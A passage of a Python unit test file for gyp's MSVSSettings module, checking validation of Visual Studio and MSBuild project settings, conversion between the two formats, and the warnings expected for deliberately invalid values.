'AdditionalOptions': 'a string1',
'AdditionalIncludeDirectories': 'folder1;folder2',
'Culture': '1003',
'IgnoreStandardIncludePath': 'true',
'notgood2': 'bogus',
'PreprocessorDefinitions': 'string1;string2',
'ResourceOutputFileName': 'a string1',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2'},
'VCLibrarianTool': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'ExportNamedFunctions': 'string1;string2',
'ForceSymbolReferences': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2',
'LinkLibraryDependencies': 'true',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'VCManifestTool': {
'AdditionalManifestFiles': 'file1;file2',
'AdditionalOptions': 'a string1',
'AssemblyIdentity': 'a string1',
'ComponentFileName': 'a_file_name',
'DependencyInformationFile': 'a_file_name',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a string1',
'ManifestResourceFile': 'a_file_name',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'truel',
'UpdateFileHashesSearchPath': 'a_file_name',
'UseFAT32Workaround': 'true',
'UseUnicodeResponseFiles': 'true',
'VerboseOutput': 'true'}},
self.stderr)
self._ExpectedWarnings([
'Warning: for VCCLCompilerTool/BasicRuntimeChecks, '
'index value (5) not in expected range [0, 4)',
'Warning: for VCCLCompilerTool/BrowseInformation, '
"invalid literal for int() with base 10: 'fdkslj'",
'Warning: for VCCLCompilerTool/CallingConvention, '
'index value (-1) not in expected range [0, 4)',
'Warning: for VCCLCompilerTool/DebugInformationFormat, '
'converted value for 2 not specified.',
'Warning: unrecognized setting VCCLCompilerTool/Enableprefast',
'Warning: unrecognized setting VCCLCompilerTool/ZZXYZ',
'Warning: for VCLinkerTool/TargetMachine, '
'converted value for 2 not specified.',
'Warning: unrecognized setting VCMIDLTool/notgood',
'Warning: unrecognized setting VCResourceCompilerTool/notgood2',
'Warning: for VCManifestTool/UpdateFileHashes, '
"expected bool; got 'truel'"
''])
def testValidateMSBuildSettings_settings(self):
"""Tests that for invalid MSBuild settings."""
MSVSSettings.ValidateMSBuildSettings(
{'ClCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': ['string1', 'string2'],
'AdditionalUsingDirectories': 'folder1;folder2',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': 'NoListing',
'BasicRuntimeChecks': 'StackFrameRuntimeCheck',
'BrowseInformation': 'false',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'BuildingInIDE': 'true',
'CallingConvention': 'Cdecl',
'CompileAs': 'CompileAsC',
'CompileAsManaged': 'true',
'CreateHotpatchableImage': 'true',
'DebugInformationFormat': 'ProgramDatabase',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'string1;string2',
'EnableEnhancedInstructionSet': 'StreamingSIMDExtensions',
'EnableFiberSafeOptimizations': 'true',
'EnablePREfast': 'true',
'Enableprefast': 'bogus',
'ErrorReporting': 'Prompt',
'ExceptionHandling': 'SyncCThrow',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': 'Neither',
'FloatingPointExceptions': 'true',
'FloatingPointModel': 'Precise',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2',
'ForcedUsingFiles': 'file1;file2',
'FunctionLevelLinking': 'false',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': 'OnlyExplicitInline',
'IntrinsicFunctions': 'false',
'MinimalRebuild': 'true',
'MultiProcessorCompilation': 'true',
'ObjectFileName': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMPSupport': 'true',
'Optimization': 'Disabled',
'PrecompiledHeader': 'NotUsing',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderOutputFile': 'a_file_name',
'PreprocessKeepComments': 'true',
'PreprocessorDefinitions': 'string1;string2',
'PreprocessOutputPath': 'a string1',
'PreprocessSuppressLineNumbers': 'false',
'PreprocessToFile': 'false',
'ProcessorNumber': '33',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': 'MultiThreaded',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1Byte',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'TreatSpecificWarningsAsErrors': 'string1;string2',
'TreatWarningAsError': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2',
'UseFullPaths': 'true',
'UseUnicodeForAssemblerListing': 'true',
'WarningLevel': 'TurnOffAllWarnings',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name',
'ZZXYZ': 'bogus'},
'Link': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalManifestDependencies': 'file1;file2',
'AdditionalOptions': 'a string1',
'AddModuleNamesToAssembly': 'file1;file2',
'AllowIsolation': 'true',
'AssemblyDebug': '',
'AssemblyLinkResource': 'file1;file2',
'BaseAddress': 'a string1',
'BuildingInIDE': 'true',
'CLRImageType': 'ForceIJWImage',
'CLRSupportLastError': 'Enabled',
'CLRThreadAttribute': 'MTAThreadingAttribute',
'CLRUnmanagedCodeCheck': 'true',
'CreateHotPatchableImage': 'X86Image',
'DataExecutionPrevention': 'false',
'DelayLoadDLLs': 'file1;file2',
'DelaySign': 'true',
'Driver': 'NotSet',
'EmbedManagedResourceFile': 'file1;file2',
'EnableCOMDATFolding': 'false',
'EnableUAC': 'true',
'EntryPointSymbol': 'a string1',
'FixedBaseAddress': 'false',
'ForceFileOutput': 'Enabled',
'ForceSymbolReferences': 'file1;file2',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a string1',
'HeapReserveSize': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreEmbeddedIDL': 'true',
'IgnoreSpecificDefaultLibraries': 'a_file_list',
'ImageHasSafeExceptionHandlers': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': 'false',
'LinkDLL': 'true',
'LinkErrorReporting': 'SendErrorReport',
'LinkStatus': 'true',
'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a string1',
'MidlCommandFile': 'a_file_name',
'MinimumRequiredVersion': 'a string1',
'ModuleDefinitionFile': 'a_file_name',
'MSDOSStubFileName': 'a_file_name',
'NoEntryPoint': 'true',
'OptimizeReferences': 'false',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'PreventDllBinding': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': 'false',
'RegisterOutput': 'true',
'SectionAlignment': '33',
'SetChecksum': 'true',
'ShowProgress': 'LinkVerboseREF',
'SpecifySectionAttributes': 'a string1',
'StackCommitSize': 'a string1',
'StackReserveSize': 'a string1',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': 'Console',
'SupportNobindOfDelayLoadedDLL': 'true',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNET': 'true',
'TargetMachine': 'MachineX86',
'TerminalServerAware': 'false',
'TrackerLogDirectory': 'a_folder',
'TreatLinkerWarningAsErrors': 'true',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': 'AsInvoker',
'UACUIAccess': 'true',
'Version': 'a string1'},
'ResourceCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'Culture': '0x236',
'IgnoreStandardIncludePath': 'true',
'NullTerminateStrings': 'true',
'PreprocessorDefinitions': 'string1;string2',
'ResourceOutputFileName': 'a string1',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'UndefinePreprocessorDefinitions': 'string1;string2'},
'Midl': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'ApplicationConfigurationMode': 'true',
'ClientStubFile': 'a_file_name',
'CPreprocessOptions': 'a string1',
'DefaultCharType': 'Signed',
'DllDataFileName': 'a_file_name',
'EnableErrorChecks': 'EnableCustom',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateClientFiles': 'Stub',
'GenerateServerFiles': 'None',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'LocaleID': '33',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a string1',
'PreprocessorDefinitions': 'string1;string2',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'ServerStubFile': 'a_file_name',
'StructMemberAlignment': 'NotSet',
'SuppressCompilerWarnings': 'true',
'SuppressStartupBanner': 'true',
'TargetEnvironment': 'Itanium',
'TrackerLogDirectory': 'a_folder',
'TypeLibFormat': 'NewFormat',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'string1;string2',
'ValidateAllParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '1'},
'Lib': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'DisplayLibrary': 'a string1',
'ErrorReporting': 'PromptImmediately',
'ExportNamedFunctions': 'string1;string2',
'ForceSymbolReferences': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2',
'LinkTimeCodeGeneration': 'true',
'MinimumRequiredVersion': 'a string1',
'ModuleDefinitionFile': 'a_file_name',
'Name': 'a_file_name',
'OutputFile': 'a_file_name',
'RemoveObjects': 'file1;file2',
'SubSystem': 'Console',
'SuppressStartupBanner': 'true',
'TargetMachine': 'MachineX86i',
'TrackerLogDirectory': 'a_folder',
'TreatLibWarningAsErrors': 'true',
'UseUnicodeResponseFiles': 'true',
'Verbose': 'true'},
'Manifest': {
'AdditionalManifestFiles': 'file1;file2',
'AdditionalOptions': 'a string1',
'AssemblyIdentity': 'a string1',
'ComponentFileName': 'a_file_name',
'EnableDPIAwareness': 'fal',
'GenerateCatalogFiles': 'truel',
'GenerateCategoryTags': 'true',
'InputResourceManifests': 'a string1',
'ManifestFromManagedAssembly': 'a_file_name',
'notgood3': 'bogus',
'OutputManifestFile': 'a_file_name',
'OutputResourceManifests': 'a string1',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressDependencyElement': 'true',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'VerboseOutput': 'true'},
'ProjectReference': {
'LinkLibraryDependencies': 'true',
'UseLibraryDependencyInputs': 'true'},
'ManifestResourceCompile': {
'ResourceOutputFileName': 'a_file_name'},
'': {
'EmbedManifest': 'true',
'GenerateManifest': 'true',
'IgnoreImportLibrary': 'true',
'LinkIncremental': 'false'}},
self.stderr)
self._ExpectedWarnings([
'Warning: unrecognized setting ClCompile/Enableprefast',
'Warning: unrecognized setting ClCompile/ZZXYZ',
'Warning: unrecognized setting Manifest/notgood3',
'Warning: for Manifest/GenerateCatalogFiles, '
"expected bool; got 'truel'",
'Warning: for Lib/TargetMachine, unrecognized enumerated value '
'MachineX86i',
"Warning: for Manifest/EnableDPIAwareness, expected bool; got 'fal'"])
def testConvertToMSBuildSettings_empty(self):
"""Tests an empty conversion."""
msvs_settings = {}
expected_msbuild_settings = {}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
def testConvertToMSBuildSettings_minimal(self):
"""Tests a minimal conversion."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/foo',
'BasicRuntimeChecks': '0',
},
'VCLinkerTool': {
'LinkTimeCodeGeneration': '1',
'ErrorReporting': '1',
'DataExecutionPrevention': '2',
},
}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/foo',
'BasicRuntimeChecks': 'Default',
},
'Link': {
'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
'LinkErrorReporting': 'PromptImmediately',
'DataExecutionPrevention': 'true',
},
}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
def testConvertToMSBuildSettings_warnings(self):
"""Tests conversion that generates warnings."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': '1',
'AdditionalOptions': '2',
# These are incorrect values:
'BasicRuntimeChecks': '12',
'BrowseInformation': '21',
'UsePrecompiledHeader': '13',
'GeneratePreprocessedFile': '14'},
'VCLinkerTool': {
# These are incorrect values:
'Driver': '10',
'LinkTimeCodeGeneration': '31',
'ErrorReporting': '21',
'FixedBaseAddress': '6'},
'VCResourceCompilerTool': {
# Custom
'Culture': '1003'}}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': '1',
'AdditionalOptions': '2'},
'Link': {},
'ResourceCompile': {
# Custom
'Culture': '0x03eb'}}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([
'Warning: while converting VCCLCompilerTool/BasicRuntimeChecks to '
'MSBuild, index value (12) not in expected range [0, 4)',
'Warning: while converting VCCLCompilerTool/BrowseInformation to '
'MSBuild, index value (21) not in expected range [0, 3)',
'Warning: while converting VCCLCompilerTool/UsePrecompiledHeader to '
'MSBuild, index value (13) not in expected range [0, 3)',
'Warning: while converting VCCLCompilerTool/GeneratePreprocessedFile to '
'MSBuild, value must be one of [0, 1, 2]; got 14',
'Warning: while converting VCLinkerTool/Driver to '
'MSBuild, index value (10) not in expected range [0, 4)',
'Warning: while converting VCLinkerTool/LinkTimeCodeGeneration to '
'MSBuild, index value (31) not in expected range [0, 5)',
'Warning: while converting VCLinkerTool/ErrorReporting to '
'MSBuild, index value (21) not in expected range [0, 3)',
'Warning: while converting VCLinkerTool/FixedBaseAddress to '
'MSBuild, index value (6) not in expected range [0, 3)',
])
def testConvertToMSBuildSettings_full_synthetic(self):
"""Tests conversion of all the MSBuild settings."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'AdditionalUsingDirectories': 'folder1;folder2;folder3',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': '0',
'BasicRuntimeChecks': '1',
'BrowseInformation': '2',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': '0',
'CompileAs': '1',
'DebugInformationFormat': '4',
'DefaultCharIsUnsigned': 'true',
'Detect64BitPortabilityProblems': 'true',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'd1;d2;d3',
'EnableEnhancedInstructionSet': '0',
'EnableFiberSafeOptimizations': 'true',
'EnableFunctionLevelLinking': 'true',
'EnableIntrinsicFunctions': 'true',
'EnablePREfast': 'true',
'ErrorReporting': '1',
'ExceptionHandling': '2',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': '0',
'FloatingPointExceptions': 'true',
'FloatingPointModel': '1',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2;file3',
'ForcedUsingFiles': 'file1;file2;file3',
'GeneratePreprocessedFile': '1',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': '2',
'KeepComments': 'true',
'MinimalRebuild': 'true',
'ObjectFile': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMP': 'true',
'Optimization': '3',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderThrough': 'a_file_name',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': '0',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'UseFullPaths': 'true',
'UsePrecompiledHeader': '1',
'UseUnicodeResponseFiles': 'true',
'WarnAsError': 'true',
'WarningLevel': '2',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name'},
'VCLinkerTool': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalLibraryDirectories_excluded': 'folder1;folder2;folder3',
'AdditionalManifestDependencies': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AddModuleNamesToAssembly': 'file1;file2;file3',
'AllowIsolation': 'true',
'AssemblyDebug': '0',
'AssemblyLinkResource': 'file1;file2;file3',
'BaseAddress': 'a_string',
'CLRImageType': '1',
'CLRThreadAttribute': '2',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '0',
'DelayLoadDLLs': 'file1;file2;file3',
'DelaySign': 'true',
'Driver': '1',
'EmbedManagedResourceFile': 'file1;file2;file3',
'EnableCOMDATFolding': '0',
'EnableUAC': 'true',
'EntryPointSymbol': 'a_string',
'ErrorReporting': '0',
'FixedBaseAddress': '1',
'ForceSymbolReferences': 'file1;file2;file3',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateManifest': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a_string',
'HeapReserveSize': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreDefaultLibraryNames': 'file1;file2;file3',
'IgnoreEmbeddedIDL': 'true',
'IgnoreImportLibrary': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': '2',
'LinkIncremental': '1',
'LinkLibraryDependencies': 'true',
'LinkTimeCodeGeneration': '2',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a_string',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'OptimizeForWindows98': '1',
'OptimizeReferences': '0',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': '1',
'RegisterOutput': 'true',
'ResourceOnlyDLL': 'true',
'SetChecksum': 'true',
'ShowProgress': '0',
'StackCommitSize': 'a_string',
'StackReserveSize': 'a_string',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': '2',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNet': 'true',
'TargetMachine': '3',
'TerminalServerAware': '2',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': '1',
'UACUIAccess': 'true',
'UseLibraryDependencyInputs': 'false',
'UseUnicodeResponseFiles': 'true',
'Version': 'a_string'},
'VCResourceCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'Culture': '1003',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'ResourceOutputFileName': 'a_string',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3'},
'VCMIDLTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'CPreprocessOptions': 'a_string',
'DefaultCharType': '0',
'DLLDataFileName': 'a_file_name',
'EnableErrorChecks': '2',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a_string',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '3',
'SuppressStartupBanner': 'true',
'TargetEnvironment': '1',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'ValidateParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '4'},
'VCLibrarianTool': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalLibraryDirectories_excluded': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'ExportNamedFunctions': 'd1;d2;d3',
'ForceSymbolReferences': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'LinkLibraryDependencies': 'true',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'VCManifestTool': {
'AdditionalManifestFiles': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AssemblyIdentity': 'a_string',
'ComponentFileName': 'a_file_name',
'DependencyInformationFile': 'a_file_name',
'EmbedManifest': 'true',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a_string',
'ManifestResourceFile': 'my_name',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'UseFAT32Workaround': 'true',
'UseUnicodeResponseFiles': 'true',
'VerboseOutput': 'true'}}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string /J',
'AdditionalUsingDirectories': 'folder1;folder2;folder3',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': 'NoListing',
'BasicRuntimeChecks': 'StackFrameRuntimeCheck',
'BrowseInformation': 'true',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': 'Cdecl',
'CompileAs': 'CompileAsC',
'DebugInformationFormat': 'EditAndContinue',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'd1;d2;d3',
'EnableEnhancedInstructionSet': 'NotSet',
'EnableFiberSafeOptimizations': 'true',
'EnablePREfast': 'true',
'ErrorReporting': 'Prompt',
'ExceptionHandling': 'Async',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': 'Neither',
'FloatingPointExceptions': 'true',
'FloatingPointModel': 'Strict',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2;file3',
'ForcedUsingFiles': 'file1;file2;file3',
'FunctionLevelLinking': 'true',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': 'AnySuitable',
'IntrinsicFunctions': 'true',
'MinimalRebuild': 'true',
'ObjectFileName': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMPSupport': 'true',
'Optimization': 'Full',
'PrecompiledHeader': 'Create',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderOutputFile': 'a_file_name',
'PreprocessKeepComments': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'PreprocessSuppressLineNumbers': 'false',
'PreprocessToFile': 'true',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': 'MultiThreaded',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1Byte',
'SuppressStartupBanner': 'true',
'TreatWarningAsError': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'UseFullPaths': 'true',
'WarningLevel': 'Level2',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name'},
'Link': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalManifestDependencies': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AddModuleNamesToAssembly': 'file1;file2;file3',
'AllowIsolation': 'true',
'AssemblyDebug': '',
'AssemblyLinkResource': 'file1;file2;file3',
'BaseAddress': 'a_string',
'CLRImageType': 'ForceIJWImage',
'CLRThreadAttribute': 'STAThreadingAttribute',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '',
'DelayLoadDLLs': 'file1;file2;file3',
'DelaySign': 'true',
'Driver': 'Driver',
'EmbedManagedResourceFile': 'file1;file2;file3',
'EnableCOMDATFolding': '',
'EnableUAC': 'true',
'EntryPointSymbol': 'a_string',
'FixedBaseAddress': 'false',
'ForceSymbolReferences': 'file1;file2;file3',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a_string',
'HeapReserveSize': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreEmbeddedIDL': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': 'true',
'LinkErrorReporting': 'NoErrorReport',
'LinkTimeCodeGeneration': 'PGInstrument',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a_string',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'NoEntryPoint': 'true',
'OptimizeReferences': '',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': 'false',
'RegisterOutput': 'true',
'SetChecksum': 'true',
'ShowProgress': 'NotSet',
'StackCommitSize': 'a_string',
'StackReserveSize': 'a_string',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': 'Windows',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNET': 'true',
'TargetMachine': 'MachineARM',
'TerminalServerAware': 'true',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': 'HighestAvailable',
'UACUIAccess': 'true',
'Version': 'a_string'},
'ResourceCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'Culture': '0x03eb',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'ResourceOutputFileName': 'a_string',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3'},
'Midl': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'CPreprocessOptions': 'a_string',
'DefaultCharType': 'Unsigned',
'DllDataFileName': 'a_file_name',
'EnableErrorChecks': 'All',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a_string',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '4',
'SuppressStartupBanner': 'true',
'TargetEnvironment': 'Win32',
'TypeLibraryName': 'a_file_name',
